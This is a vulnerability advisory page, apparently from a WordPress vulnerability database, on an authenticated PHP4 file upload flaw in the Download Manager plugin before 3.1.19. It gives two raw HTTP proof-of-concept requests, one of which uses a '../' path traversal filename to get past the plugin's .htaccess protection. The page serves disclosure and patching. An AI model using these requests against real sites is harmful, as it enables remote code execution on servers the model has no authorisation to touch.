Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:4CA9F811-3461-4DEA-938F-1528440E2708
HistoryApr 30, 2021 - 12:00 a.m.

Download Manager < 3.1.19 - Authenticated (author+) PHP4 File Upload to RCE

2021-04-3000:00:00
wpvulndb
190
JSON

The wpdm_admin_upload_file AJAX action used a blacklist approach to forbid potential dangerous files, such as PHP, from being uploaded. However, other dangerous extensions, like .php4 were not forbidden.

As an author (or any account with the upload_files capability), attach a .php4 file to a download (/wp-admin/post-new.php?post_type=wpdmpro)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 518
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="test.php4"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be located at https://example.com/wp-content/uploads/download-manager-files/test.php4

Even though the plugin has an .htaccess to prevent access to files in /uploads/download-manager-files/, (which will only work on Apache web servers, leaving IIS and Nginx unprotected), the protection can be bypasssed via a path traversal vector to make the file go in another arbitrary folder when using the chunks handler

POST /wp-admin/admin-ajax.php?chunks=1 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 634
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="name"

../test.php4
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="whatever"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be at https://example.com/wp-content/uploads/test.php4 and accessible to anyone
JSON